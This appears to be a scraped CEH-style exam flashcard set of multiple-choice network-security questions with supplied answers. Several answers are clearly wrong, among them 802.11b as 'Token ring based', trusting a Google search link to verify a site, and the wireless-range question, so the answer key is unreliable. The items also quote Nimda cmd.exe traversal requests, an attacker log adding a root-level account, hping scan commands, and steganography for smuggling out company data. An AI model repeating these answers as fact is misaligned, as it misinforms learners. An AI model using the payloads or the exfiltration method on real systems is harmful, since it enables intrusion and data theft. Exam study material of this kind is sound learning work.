d. Timing options to slow the speed that the port scan is conducted

NTP allows you to set the clocks on your systems very accurately, to within 100ms and sometimes-even 10ms. Knowing the exact time is extremely important for enterprise security. Various security protocols depend on an accurate source of time information in order to prevent "playback" attacks. These protocols tag their communications with the current time, to prevent attackers from replaying the same communications, e.g., a login/password interaction or even an entire communication, at a later date. One can circumvent this tagging, if the clock can be set back to the time the communication was recorded. An attacker attempts to try corrupting the clocks on devices on your network. You run Wireshark to detect the NTP traffic to see if there are any irregularities on the network. What port number you should enable in Wireshark display filter to view NTP packets? a. TCP Port 124 b. TCP Port 126 c. UDP Port 125 d. UDP Port 123

d. UDP Port 123

In an attempt to secure his 802.11b wireless network, Ulf decides to use a strategic antenna positioning. He places the antenna for the access points near the center of the building. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the building's center. There is a large parking lot and outlying filed surrounding the building that extends out half a mile around the building. Ulf figures that with this and his placement of antennas, his wireless network will be safe from attack. Which of the following statements is true? a. Ulf's network will be safe but only of he doesn't switch to 802.11a. b. With the 300 feet limit of a wireless signal,Ulf's network is safe. c. Wireless signals can be detected from miles away,Ulf's network is not safe. d. Ulf's network will not be safe until he also enables WEP.

d. Ulf's network will not be safe until he also enables WEP.

An Attacker creates a zuckerjournals.com website by copying and mirroring HACKERJOURNALS.COM site to spread the news that Hollywood actor Jason Jenkins died in a car accident. The attacker then submits his fake site for indexing in major search engines. When users search for "Jason Jenkins", attacker's fake site shows up and dupes victims by the fake news. Picture: (Test 2 #49) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-160a.gif This is another great example that some people do not know what URL's are. Real website: Fake website: http://www.zuckerjournals.com The website is clearly not WWW.HACKERJOURNALS.COM. It is obvious for many, but unfortunately some people still do not know what an URL is. It's the address that you enter into the address bar at the top your browser and this is clearly not legit site, its www.zuckerjournals.com How would you verify if a website is authentic or not? a. Visit the site using secure HTTPS protocol and check the SSL certificate for authenticity b. Enable Cache on your browser and lookout for error message warning on the screen c. Navigate to the site by visiting various blogs and forums for authentic links d. Visit the site by clicking on a link from Google search engine

d. Visit the site by clicking on a link from Google search engine

Under what conditions does a secondary name server request a zone transfer from a primary name server? a. When the TTL falls to zero b. When a secondary SOA is higher that a primary SOA c. When a secondary name server has had its service restarted d. When a primary SOA is higher that a secondary SOA e. When a primary name server has had its service restarted

d. When a primary SOA is higher that a secondary SOA

A very useful resource for passively gathering information about a target company is: a. Traceroute b. Ping sweep c. Host scanning d. Whois search

d. Whois search

WinDump is a popular sniffer which results from the porting to Windows of TcpDump for Linux. What library does it use? a. LibPcap b. None of the answers apply c. Wincap d. WinPcap

d. WinPcap

What type of port scan is shown below? Picture: (Test 6 #46) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-544.gif a. SYN Stealth Scan b. Idle Scan c. Windows Scan d. XMAS Scan

d. XMAS Scan

Which of the following is a common Service Oriented Architecture (SOA) vulnerability? a. Cross-site scripting b. SQL injection c. VPath injection d. XML denial of service issues

d. XML denial of service issues

You work for Acme Corporation as Sales Manager. The company has tight network security restrictions. You are trying to steal data from the company's Sales database (Sales.xls) and transfer them to your home computer. Your company filters and monitors traffic that leaves from the internal network to the Internet. How will you achieve this without raising suspicion? a. Package the Sales.xls using Trojan wrappers and telnet them back your home computer b. Change the extension of Sales.xls to sales.txt and upload them as attachment to your hotmail account c. Encrypt the Sales.xls using PGP and e-mail it to your personal gmail account d. You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques

d. You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques

Samuel is the network administrator of DataX Communications, Inc. He is trying to configure his firewall to block password brute force attempts on his network. He enables blocking the intruder's IP address for a period of 24 hours' time after more than three unsuccessful attempts. He is confident that this rule will secure his network from hackers on the Internet. But he still receives hundreds of thousands brute-force attempts generated from various IP addresses around the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to enable the random usage of various proxies on each request so as not to get caught by the firewall rule. Later he adds another rule to his firewall and enables small sleep on the password attempt so that if the password is incorrect, it would take 45 seconds to return to the user to begin another attempt. Since an intruder may use multiple machines to brute force the password, he also throttles the number of connections that will be prepared to accept from a particular IP address. This action will slow the intruder's attempts. Samuel wants to completely block hackers brute force attempts on his network. What are the alternatives to defending against possible brute-force password attacks on his site? a. Enforce complex password policy on your network so that passwords are more difficult to brute force b. Enforce a password policy and use account lockouts after three wrong logon attempts even though this might lock out legit users c. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the Firewall manually d. You cannot completely block the intruders attempt if they constantly switch proxies

d. You cannot completely block the intruders attempt if they constantly switch proxies

Which command lets a tester enumerate alive systems in a class C network via ICMP using native Windows tools? a. for %V in (1 1 255) do PING 192.168.2.%V b. ping 192.168.2. c. ping 192.168.2.255 d. for /L %V in (1 1 254) do PING -n 1 192.168.2.%V | FIND /I "Reply"

d. for /L %V in (1 1 254) do PING -n 1 192.168.2.%V | FIND /I "Reply"

Which of the following algorithms can be used to guarantee the integrity of messages being sent, in transit, or stored? (Choose the best answer) a. symmetric algorithms b. asymmetric algorithms c. integrity algorithms d. hashing algorithms

d. hashing algorithms

Least privilege is a security concept that requires that a user is a. given root or administrative privileges. b. given privileges equal to everyone else in the department. c. trusted to keep all data and access to that data under their sole control. d. limited to those functions required to do the job.

d. limited to those functions required to do the job.

On a Linux device, which of the following commands will start the Nessus client in the background so that the Nessus server can be configured? a. nessus -d b. nessus *s c. nessus + d. nessus &

d. nessus &

After studying the following log entries, how many user IDs can you identify that the attacker has tampered with? 1. mkdir -p /etc/X11/applnk/Internet/.etc 2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd 3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd 4. touch -acmr /etc /etc/X11/applnk/Internet/.etc 5. passwd nobody -d 6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash 7. passwd dns -d 8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd 9. touch -acmr /etc/X11/applnk/Internet/.etc /etc a. acmr,dns b. nobody,IUSR_ c. IUSR_ d. nobody,dns

d. nobody,dns

Web servers often contain directories that do not need to be indexed. You create a text file with search engine indexing restrictions and place it on the root directory of the Web Server. User-agent: * Disallow: /images/ Disallow: /banners/ Disallow: /Forms/ Disallow: /Dictionary/ Disallow: /_borders/ Disallow: /_fpclass/ Disallow: /_overlay/ Disallow: /_private/ Disallow: /_themes/ What is the name of this file? a. spf.txt b. search.txt c. blocklist.txt d. robots.txt

d. robots.txt

A covert channel is a channel that a. transfers information via a communication path within a computer system,or network for transfer of data. b. transfers information over,within a computer system,or network that is within the security policy. c. transfers information over,within a computer system,or network that is encrypted. d. transfers information over,within a computer system,or network that is outside of the security policy.

d. transfers information over,within a computer system,or network that is outside of the security policy.

Jason is the network administrator of Spears Technology. He has enabled SNORT IDS to detect attacks going through his network. He receives Snort SMS alerts on his iPhone whenever there is an attempted intrusion to his network. He receives the following SMS message during the weekend. Picture: (Test 2 #34) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-123.gif An attacker Chew Siew sitting in Beijing, China had just launched a remote scan on Jason's network with the hping command. Which of the following hping2 command is responsible for the above snort alert? a.chenrocks:/home/siew #hping -D -V -R -S -Z -Y 192.168.2.56 -p 22 -c 5 -t 118 b.chenrocks:/home/siew #hping -F -Q -J -A -C -W 192.168.2.56 -p 22 -c 5 -t 118 c.chenrocks:/home/siew #hping -G -T -H -S -L -W 192.168.2.56 -p 22 -c 5 -t 118 d.chenrocks:/home/siew #hping -S -R -P -A -F -U 192.168.2.56 -p 22 -c 5 -t 118

d.chenrocks:/home/siew #hping -S -R -P -A -F -U 192.168.2.56 -p 22 -c 5 -t 118

Peter extracts the SID list from Windows 2008 Server machine using the hacking tool "SIDExtracter". Here is the output of the SIDs: S-1-5-21-1125394485-807628933-54985860-100 john S-1-5-21-1125394485-807628933-54985860-652 rebecca S-1-5-21-1125394485-807628933-54985860-412 sheela S-1-5-21-1125394485-807628933-54985860-999 shawn S-1-5-21-1125394485-807628933-54985860-777 somia S-1-5-21-1125394485-807628933-54985860-500 chang S-1-5-21-1125394485-807628933-54985860-555 Micah From the above list identify the user account with System Administrator privileges? a. Shawn b. John c. Micah d. Somia e. Chang f. Sheela g. Rebecca

e. Chang

Picture: (Test 1 #73) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-077.gif What type of Trojan is this? a. Denial of Service Trojan b. RAT Trojan c. Destructing Trojan d. E-Mail Trojan e. Defacement Trojan

e. Defacement Trojan

A XYZ security System Administrator is reviewing the network system log files. He notes the following: Network log files are at 5 MB at 12:00 noon. At 14:00 hours,the log files at 3 AM What should he assume has happened and what should he do about the situation? a. He should log the file size, and archive the information, because the router crashed. b. He should run a file system check, because the Syslog server has a self correcting file system problem. c. He should disconnect from the Internet discontinue any further unauthorized use, because an attack has taken place. d. He should contact the attacker's ISP as soon as possible and have the connection disconnected. e. He should log the event as suspicious activity ,continue to investigate, and take further steps according to site security policy.

e. He should log the event as suspicious activity ,continue to investigate, and take further steps according to site security policy.

A denial of Service (DoS) attack works on the following principle: a. All CLIENT systems have TCP/IP stack implementation weakness that can be compromised and permit them to lunch an attack easily. b. A server stops accepting connections from certain networks one those network become flooded. c. MS-DOS and PC-DOS operating system utilize a weaknesses that can be compromised and permit them to launch an attack easily. d. Overloaded buffer systems can easily address error conditions and respond appropriately. e. Host systems cannot respond to real traffic,if they have an overwhelming number of incomplete connections (SYN/RCVD State).

e. Host systems cannot respond to real traffic,if they have an overwhelming number of incomplete connections (SYN/RCVD State).

Which type of password cracking technique works like dictionary attack but adds some numbers and symbols to the words from the dictionary and tries to crack the password? a. Dictionary attack b. Syllable attack c. Rule-based attack d. Brute forcing attack e. Hybrid attack

e. Hybrid attack

What is a primary advantage a hacker gains by using encryption or programs such as Loki? a. It allows an easy way to gain administrator rights b. It is effective against Windows computers c. Traffic will not be modified in transit d. It slows down the effective response of an IDS e. IDS systems are unable to decrypt it

e. IDS systems are unable to decrypt it

To what does "message repudiation" refer to what concept in the realm of email security? a. Message repudiation means a recipient can be sure that a message was sent from a certain host. b. Message repudiation means a user can claim damages for a mail message that damaged their reputation. c. Message repudiation means a user can validate which mail server or servers a message was passed through. d. Message repudiation means a recipient can be sure that a message was sent from a particular person. e. Message repudiation means a sender can claim they did not actually send a particular message.

e. Message repudiation means a sender can claim they did not actually send a particular message.

What is the name of the software tool used to crack a single account on Netware Servers using a dictionary attack? a. GetCrack b. CrackNov c. NovCrack d. NPWCrack e. NWPCrack

e. NWPCrack

Which of the following is an automated vulnerability assessment tool? a. Kismet b. Whack a Mole c. Jill32 d. Nmap e. Nessus

e. Nessus

Pandora is used to attack __________ network operating systems. a. UNIX b. Linux c. MAC OS d. Windows e. Netware

e. Netware

You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe. What caused this? Picture: (Test 8 #99) GET /scripts/root.exe?/c+dir GET /MSDAC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..% 5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..% 5c../winnt/system32/cmd.exe?/c+dir GET /msdac/..%5c../..%5c../..%5c/..xc1xc../..xc1xc../..xc1xc../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1xc../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0x9c/winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..% 35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..% 5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..% 2f..winnt/system32/cmd.exe?/c+dir a. The PIF virus b. Code Red c. Ping of Death d. The Morris worm e. Nimda f. Trinoo

e. Nimda

What is the disadvantage of an automated vulnerability assessment tool? a. Slow b. Prone to false positives c. Prone to false negatives d. Ineffective e. Noisy

e. Noisy

NSLookup is a good tool to use to gain additional information about a target network. What does the following command accomplish? nslookup > server > set type =any > ls -d a. Verifies zone security b. Resets the DNS cache c. Enables DNS spoofing d. Loads bogus entries into the DNS table e. Performs a zone transfer

e. Performs a zone transfer

You receive an e-mail like the one shown below. When you click on the link contained in the mail, you are redirected to a website seeking you to download free Anti-Virus software. Dear valued customers, We are pleased to announce the newest version of Antivirus 2010 for Windows which will probe you with total security against the latest spyware, malware, viruses, Trojans and other online threats. Simply visit the link below and enter your antivirus code: Antivirus code: 5014 http://www.juggyboy/virus/virus.html Thank you for choosing us, the worldwide leader Antivirus solutions. Mike Robertson PDF Reader Support Copyright Antivirus 2010 ?All rights reserved If you want to stop receiving mail, please go to: http://www.juggyboy.com or you may contact us at the following address: Media Internet Consultants, Edif. Neptuno, Planta Baja, Ave. Ricardo J. Alfaro, Tumba Muerto, n/a Panama How will you determine if this is Real Anti-Virus or Fake Anti-Virus website? a. Download and install Anti-Virus software from this suspicious looking site,your Windows 7 will prompt you and stop the installation if the downloaded file is a malware b. Download and install Anti-Virus software from this suspicious looking site,your Windows 7 will prompt you and stop the installation if the downloaded file is a malware c. Connect to the site using SSL,if you are successful then the website is genuine d. Look at the website design,if it looks professional then it is a Real Anti-Virus website e. Search using the URL and Anti-Virus product name into Google and lookout for suspicious warnings against this site

e. Search using the URL and Anti-Virus product name into Google and lookout for suspicious warnings against this site

In the following example, which of these is the "exploit"? Today, Microsoft Corporation released a security notice. It detailed how a person could bring down the Windows 2003 Server operating system, by sending malformed packets to it. They detailed how this malicious process had been automated using basic scripting. Even worse, the new automated method for bringing down the server has already been used to perform denial ofservice attacks on many large commercial websites. Select the best answer. a. Microsoft Corporation is the exploit. b. The security "hole" in the product is the exploit. c. The exploit is the hacker that would use this vulnerability. d. Windows 2003 Server e. The documented method of how to use the vulnerability to gain unprivileged access.

e. The documented method of how to use the vulnerability to gain unprivileged access.

802.11b is considered a ____________ protocol. a. Secure b. Unreliable c. Unsecure d. Connectionless e. Token ring based

e. Token ring based

Maintaining a secure Web server requires constant effort, resources, and vigilance from an organization. Securely administering a Web server on a daily basis is an essential aspect of Web server security. Maintaining the security of a Web server will usually involve the following steps: 1. Configuring, protecting, and analyzing log files 2. Backing up critical information frequently 3. Maintaining a protected authoritative copy of the organization's Web content 4. Establishing and following procedures for recovering from compromise 5. Testing and applying patches in a timely manner 6. Testing security periodically. In which step would you engage a forensic investigator? a. 3 b. 2 c. 6 d. 5 e. 1 f. 4

f. 4

User which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud? a. 18 U.S.C 1831 Economic Espionage Act b. 18 U.S.C 1029 Possession of Access Devices c. 18 U.S.C 1361 Injury to Government Property d. 18 U.S.C 1343 Fraud by wire,radio or television e. 18 U.S.C 1832 Trade Secrets Act f. 18 U.S.C 1362 Government communication systems g. 18 U.S.C 1030 Fraud and related activity in connection with computers

g. 18 U.S.C 1030 Fraud and related activity in connection with computers

While footprinting a network, what port/service should you look for to attempt a zone transfer? a. 22 TCP b. 161 UDP c. 60 TCP d. 25 UDP e. 25 TCP f. 53 UDP g. 53 TCP

g. 53 TCP

E-mail tracking is a method to monitor and spy the delivered e-mails to the intended recipient. Picture: (Test 2 #36) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-132.gif Select a feature, which you will NOT be able to accomplish with this probe? a. Send destructive e-mails b. GPS location and map of the recipient c. Time spent on reading the e-mails d. When the e-mail was received and read e. Whether or not the recipient visited any links sent to them f. Track PDF and other types of attachments g. Remote control the User's E-mail client application and hijack the traffic h. Set messages to expire after specified time

g. Remote control the User's E-mail client application and hijack the traffic


संबंधित स्टडी सेट्स

Due Process and Right to Privacy

View Set

Community Chapter 11 NCLEX Questions

View Set

Complete Commercial Law (2nd Half)

View Set

Trigonometric Ratios (0, 30, 45, 60, 90, 180, 270)

View Set

Chapter 21 the rise of progressivism

View Set

Network + FInal Exam Practice test Certmaster

View Set

NCLEX-Benign prostatic hypertrophy BPH

View Set

Activity 3.3.7 Analyze the Quest for Human Rights

View Set

Site Safety Chapter 3: Section BC 3302: Definitions

View Set

Biology Sickle-cell and Genes test McGraw-Hill

View Set